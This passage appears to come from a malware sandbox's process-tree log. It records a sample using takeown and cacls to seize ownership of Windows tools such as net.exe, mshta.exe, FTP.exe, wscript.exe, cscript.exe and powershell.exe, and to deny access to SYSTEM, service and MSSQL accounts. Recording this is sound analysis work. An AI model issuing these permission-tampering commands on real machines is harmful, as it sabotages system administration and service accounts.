    cacls C:\Windows\system32\net.exe /e /g Users:r
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /g Administrators:r
    3⤵
    PID:716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d SERVICE
    3⤵
    PID:4628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssqlserver
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d "network service"
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d system
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net.exe /a
    3⤵
    - Modifies file permissions
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
    3⤵
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2280
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:416
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
    3⤵
    PID:1868
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d system
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\net1.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /g Administrators:f
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1264
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Users:r
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /g Administrators:r
    3⤵
    PID:4776
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d SERVICE
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssqlserver
    3⤵
    PID:3692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d "network service"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d system
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\net1.exe /a
    3⤵
    - Modifies file permissions
    PID:3212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
    3⤵
    PID:4692
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
    3⤵
    PID:3336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1336
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
    3⤵
    PID:3268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3844
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
    3⤵
    PID:3856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3276
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d system
    3⤵
    PID:3540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:704
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
    3⤵
    PID:5004
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\mshta.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /g Administrators:f
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Users:r
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
    3⤵
    PID:292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2760
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d SERVICE
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d "network service"
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4664
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d system
    3⤵
    PID:880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\mshta.exe /a
    3⤵
    - Modifies file permissions
    PID:4060
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
    3⤵
    PID:3264
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
    3⤵
    PID:4248
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4408
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1344
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
    3⤵
    PID:3064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2624
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d system
    3⤵
    PID:3216
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:5036
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\FTP.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1324
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /g Administrators:f
    3⤵
    PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Users:r
    3⤵
    PID:1880
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d SERVICE
    3⤵
    PID:4112
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d "network service"
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d system
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\FTP.exe /a
    3⤵
    - Modifies file permissions
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
    3⤵
    PID:4540
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
    3⤵
    PID:3860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3288
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
    3⤵
    PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2636
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3548
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
    3⤵
    PID:1456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3764
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d system
    3⤵
    PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\wscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2384
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /g Administrators:f
    3⤵
    PID:1668
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2464
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Users:r
    3⤵
    PID:980
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d SERVICE
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
    3⤵
    PID:1416
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d "network service"
    3⤵
    PID:1800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:560
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d system
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\wscript.exe /a
    3⤵
    - Modifies file permissions
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
    3⤵
    PID:3696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
    3⤵
    PID:2184
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4816
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:776
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d system
    3⤵
    PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\cscript.exe /a
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3360
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /g Administrators:f
    3⤵
    PID:3940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:552
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Users:r
    3⤵
    PID:2404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d SERVICE
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
    3⤵
    PID:2640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:704
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d "network service"
    3⤵
    PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3648
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d system
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:2164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\cscript.exe /a
    3⤵
    - Modifies file permissions
    PID:3300
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:1616
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
    3⤵
    PID:3724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
    3⤵
    PID:2524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3888
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
    3⤵
    PID:3480
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
    3⤵
    PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d system
    3⤵
    PID:4444
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3952
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:4932
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:640
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
    3⤵
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3104
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
    3⤵
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4780
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:296
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
    3⤵
    PID:884
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4888
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
    3⤵
    PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:320
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
    3⤵
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:3084
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
    3⤵
    PID:4044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
    3⤵
    - Modifies file permissions
    PID:292
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4672
